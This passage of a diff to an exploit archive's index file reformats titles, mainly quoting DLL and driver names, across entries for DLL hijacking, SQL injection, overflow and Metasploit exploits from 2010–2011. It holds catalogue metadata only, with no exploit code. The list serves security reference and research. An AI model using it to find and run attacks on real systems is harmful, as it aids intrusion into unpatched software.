Hijacking",2010-08-25,Secfence,windows,local,0 -14751,platforms/windows/local/14751.txt,"Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 +14751,platforms/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 @@ -12935,7 +12935,7 @@ id,file,description,date,author,platform,type,port 14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0 14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 -14769,platforms/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14769,platforms/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0 14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0 @@ -12947,13 +12947,13 @@ id,file,description,date,author,platform,type,port 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,windows,local,0 -14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 +14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 -14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 +14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 -14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 +14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0 @@ -12974,7 +12974,7 @@ id,file,description,date,author,platform,type,port 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0 14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0 -14824,platforms/windows/dos/14824.txt,"LeadTools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow",2010-08-28,LiquidWorm,windows,dos,0 +14824,platforms/windows/dos/14824.txt,"LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow",2010-08-28,LiquidWorm,windows,dos,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 @@ -13014,13 +13014,13 @@ id,file,description,date,author,platform,type,port 14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 -14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 +14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Exploit",2010-11-17,Dr_IDE,windows,remote,0 14887,platforms/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 -14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 +14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0 14896,platforms/php/webapps/14896.txt,"Joomla! Component iJoomla! magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0 14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 @@ -13133,7 +13133,7 @@ id,file,description,date,author,platform,type,port 15056,platforms/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15058,platforms/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,asp,webapps,0 15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,php,webapps,0 -15061,platforms/windows/dos/15061.txt,"Microsoft DRM Technology (msnetobj.dll) ActiveX - Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 +15061,platforms/windows/dos/15061.txt,"Microsoft DRM Technology 'msnetobj.dll' ActiveX - Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename' init() .bss (PoC)",2010-09-20,Stoke,linux,dos,0 15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Admin _zrl_ Account Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0 15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 @@ -13141,7 +13141,7 @@ id,file,description,date,author,platform,type,port 15067,platforms/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 -15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0 +15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0 15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0 @@ -13165,7 +13165,7 @@ id,file,description,date,author,platform,type,port 15098,platforms/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 15114,platforms/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery (Add Admin)",2010-09-24,"John Johnz",win_x86,webapps,80 -15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 - VMkbd.sys Denial of Service",2010-09-25,"Lufeng Li",windows,dos,0 +15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 @@ -13256,7 +13256,7 @@ id,file,description,date,author,platform,type,port 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG - User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0 -15594,platforms/php/webapps/15594.txt,"AuraCMS - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 +15594,platforms/php/webapps/15594.txt,"AuraCMS 1.62 - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - File Download Exploit",2010-11-22,Beach,jsp,webapps,0 15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps,0 @@ -13393,7 +13393,7 @@ id,file,description,date,author,platform,type,port 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0 15382,platforms/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 -15383,platforms/windows/dos/15383.c,"Rising - RSNTGDI.sys Local Denial of Service",2010-11-02,ze0r,windows,dos,0 +15383,platforms/windows/dos/15383.c,"Rising - 'RSNTGDI.sys' Local Denial of Service",2010-11-02,ze0r,windows,dos,0 15384,platforms/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service",2010-11-02,"Nikita Tarakanov",windows,dos,0 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 @@ -13570,7 +13570,7 @@ id,file,description,date,author,platform,type,port 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 15622,platforms/linux/dos/15622.c,"Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 - user agent Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps,0 -15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",windows,local,0 +15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - 'KmxSbx.sys' Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS - Permanent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps,0 15626,platforms/windows/local/15626.py,"OtsTurntables 1.00.048 - (m3u/ofl) Local Buffer Overflow (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps,0 @@ -13671,7 +13671,7 @@ id,file,description,date,author,platform,type,port 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow (SEH)",2010-12-12,"James Fitts",windows,local,0 -15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - ActiveX Exploit (PrintControl.dll)",2010-12-14,Dr_IDE,windows,remote,0 +15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - 'PrintControl.dll' ActiveX Exploit",2010-12-14,Dr_IDE,windows,remote,0 15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0 15736,platforms/php/webapps/15736.txt,"MantisBT 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,php,webapps,0 15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - Local File Inclusion",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 @@ -13771,7 +13771,7 @@ id,file,description,date,author,platform,type,port 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 -15845,platforms/windows/dos/15845.py,"Irfanview 4.27 - JP2000.dll plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 +15845,platforms/windows/dos/15845.py,"Irfanview 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 @@ -13870,7 +13870,7 @@ id,file,description,date,author,platform,type,port 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0 -15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode Denial of Service",2011-01-16,MJ0011,windows,dos,0 +15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0 @@ -13915,7 +13915,7 @@ id,file,description,date,author,platform,type,port 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16053,platforms/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 -16055,platforms/windows/remote/16055.txt,"Oracle Document Capture - empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 +16055,platforms/windows/remote/16055.txt,"Oracle Document Capture - 'empop3.dll' Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",2011-01-26,DIES3L,php,webapps,0 16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",2011-01-26,"Xploit A Day",php,webapps,0 @@ -13979,7 +13979,7 @@ id,file,description,date,author,platform,type,port 16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",php,webapps,0 16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",php,webapps,0 16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 -16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 - vdlptokn.sys Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 +16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon - SQL Injection",2011-02-09,Saif,php,webapps,0 16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community - SQL Injection",2011-02-09,NoNameMT,php,webapps,0 16141,platforms/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 @@ -14165,9 +14165,9 @@ id,file,description,date,author,platform,type,port 16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16354,platforms/windows/remote/16354.rb,"Microsoft IIS - ISAPI w3who.dll Query String Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 -16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI nsiislog.dll ISAPI POST Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage fp30reg.dll Chunked Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16354,platforms/windows/remote/16354.rb,"Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 +16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16357,platforms/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16358,platforms/windows/remote/16358.rb,"Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16359,platforms/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -14180,11 +14180,11 @@ id,file,description,date,author,platform,type,port 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit)",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit)",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,Metasploit,windows,remote,0 +16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066)",2010-05-09,Metasploit,windows,remote,0 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 -16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,Metasploit,windows,remote,0 +16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066)",2010-08-25,Metasploit,windows,remote,0 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,windows,remote,0 16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 @@ -14276,13 +14276,13 @@ id,file,description,date,author,platform,type,port 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16464,platforms/windows/remote/16464.rb,"ISS - PAM.dll ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV ntdll.dll Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 @@ -14309,7 +14309,7 @@ id,file,description,date,author,platform,type,port 16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit)",2011-01-22,Metasploit,multiple,remote,0 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16497,platforms/windows/remote/16497.rb,"RealPlayer - ierpplug.dll ActiveX Control Playlist Name Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16497,platforms/windows/remote/16497.rb,"RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 @@ -14333,15 +14333,15 @@ id,file,description,date,author,platform,type,port 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt - ActiveX 